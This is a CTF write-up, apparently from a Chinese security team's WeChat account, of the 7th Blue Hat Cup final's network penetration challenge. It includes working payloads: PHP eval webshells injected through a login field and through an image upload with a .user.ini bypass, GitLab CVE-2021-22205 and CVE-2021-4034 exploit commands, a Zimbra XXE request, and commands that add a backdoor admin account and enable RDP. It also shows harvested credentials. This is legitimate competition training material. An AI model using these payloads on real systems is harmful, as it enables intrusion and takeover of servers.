EDI
JOIN US ▶▶▶
招新
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn方向的师傅)有意向的师傅请联系邮箱root@edisec.net、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
01
前言(本篇文章由山河师傅投稿)
恭喜山河师傅荣获第七届蓝帽杯-全国大学生网络安全技能大赛决赛冠军。
02
WriteUp
1
APK
开局
开始给了一个入口,是apk的下载链接
http://172.16.20.200/
直接fscan扫了一下入口的16
fscan64.exe -h 172.16.20.200/16
172.16.1.123
172.16.15.200
172.16.100.10
172.16.200.123
另外从下载的apk也发现了其他入口点
172.16.10.102
识别一下apk的下载二维码也发现了一个flag
2
172.16.1.123(优惠大厅)
这个应该开放了80端口。网站路径 http://172.16.1.123/pcweb
在登录点存在sql注入点
sql注入,可以注出两段hash
admin
Content: 6fab062fd242430d18aeff4e116edb04 ---lmb@123
Content: 6e3261f301f41c5f4169cd562b259994 ---LMB423ing..
用下面账号密码可以登录到后台
admin/lmb@123
后面没找到利用点
3
172.16.15.200(客服平台)
这个点通过扫描可以发现开放了一个高端口48513
然后根据web访问
发现了客服平台路径
http://172.16.15.200:48513/online.php?a=621276866&gid=&fn=&r=0.738613290228183&url=aHR0cDovLzE3Mi4xNi4xMC4xMDIv
接着就是给客服留言能xss获得管理员的cookie。这里我闭合有问题,后面靠其他点打进内网刷分就没纠结这个点了。
4
172.16.100.10(贷款平台)
开放了80端口。
对apk进行逆向分析发现了网站 http://172.16.100.10/dkpt/
根据网站下面的电话社工出密码。但是没用。登录密码不对
Content: 18855667788 ---1qaz@WSX!@#$
5
172.16.200.123(四方支付服务)
成功rce写shell
POST /Admin/Ajax.php?act=Login HTTP/1.1
Host: 172.16.200.123
Content-Length: 113
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.200.123
Referer: http://172.16.200.123/Admin/Login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
Cookie: PHPSESSID=1md8savhrsrm2lt45po5e15je1
Connection: close
admin_user=admin&admin_pass=awd;}system("echo PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4= |base64 -d >shell.php")%3b//
http://172.16.200.123/Admin/shell.php
'host' => '127.0.0.1', //数据库服务器
'port' => 3306, //数据库端口
'user' => 'root', //数据库用户名
'pwd' => 'Admin2023!', //数据库密码
'dbname' => 'pay' //数据库名
);
6
172.16.20.200(不知道这个干啥的)
开放了80 22 8888 888
在888能扫到phpmyadmin。后面渗透拿下的密码都试过了,都不对,不存在密码复用,密码也爆不出来
8888是一个宝塔
7
172.16.10.102(博彩网站)
注册一个用户登录后访问会员中心,发现一个文件上传点。经过测试uploads路径下存在index.php。文件上传有后缀名黑名单。但可以上传.user.ini。成功利用。
#上传图片马
POST /member/fileupload.php HTTP/1.1
Host: 172.16.10.102
Content-Length: 331
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.10.102
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS1zSBBgJ3xHyHQKc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.16.10.102/member/userinfo.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
Cookie: PHPSESSID=qim7prpbncoorld0lfqne09q5q
Connection: close
------WebKitFormBoundaryS1zSBBgJ3xHyHQKc
Content-Disposition: form-data; name="file"; filename="shanghe.jpg"
Content-Type: image/png
GIF89A
<?php eval($_POST['shell']);phpinfo();?>
------WebKitFormBoundaryS1zSBBgJ3xHyHQKc
Content-Disposition: form-data; name="submit"
上传
------WebKitFormBoundaryS1zSBBgJ3xHyHQKc--
#上传配置文件
------WebKitFormBoundaryS1zSBBgJ3xHyHQKc
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
GIF89A
auto_prepend_file=shanghe.jpg
------WebKitFormBoundaryS1zSBBgJ3xHyHQKc
然后连接shell
在管理员桌面拿到flag.txt
在这个机子挂代理开扫内网
03
内网
1
172.16.99.0/24网段
这个网段fscan可以发现下面存活两个主机
172.16.99.21 gitlab
172.16.99.200 禅道
gitlab成功利用CVE-2021-22205更改账号密码登录进去,拿到flag
python3 CVE-2021-22205.py -u http://172.16.99.21 -m mod user
然后写ssh公钥连接上去
python CVE-2021-22205.py -u http://172.16.99.21 -m ssh git
ssh -i id_rsa_gitlab -p 22 git@172.16.99.21
用CVE-2021-4034成功提权到root
history发现了flag
注:禅道打了最新的那个rce的洞,可以命令执行。但是只回显10来个字符,写文件啥的都失败了,尝试了很多最后还是没利用成功,就继续往下打了,内网东西很多没纠结这个。
2
10.20.100.0/24网段
10.20.100.10 Zimbra
10.10.200.55 泛微oa
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 10.20.100.10:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 313
Content-Type: text/xml
Cookie: PbootSystem=kqgrbl1iuj5ba8mjo2uebg774s
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Accept-Encoding: gzip
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>[email protected]</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>
net user test Abcd1234 /add
net localgroup administrators test /add
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
登录上去后用猕猴桃能得到一个管理员密码。猜测可能存在密码复用,但是没用上
10.10.200.55
* Username : Administrator
* Domain : OA
* Password : pingguo13pro
3
192.33.33.0/24网段
这个网段下面扫到两个ip
192.33.33.55 向日葵
192.33.33.200 不知道是啥
192.33.33.55存在很多高端口,fscan没扫出服务,是windows的机子,猜测存在向日葵利用。
xrkRce.exe -h 192.33.33.55 -p 49657 -t rce -c whoami
然后加管理员账号远程桌面上去拿到flag。传猕猴桃能抓到管理员的hash。没有域
另外在管理员桌面可以看到xshell软件,听别的师傅说是能发现其他ip的,那个就是堡垒机。但是我当时翻的时候没发现,应该还是翻得不够仔细。
另一个机子开放了7680不知道干啥的
然后结束了。打到这里应该就是差xshell这里的ip了,那个就是堡垒机,最后一层了。
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):第7届蓝帽杯-全国大学生网络安全技能大赛决赛- WriteUp
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论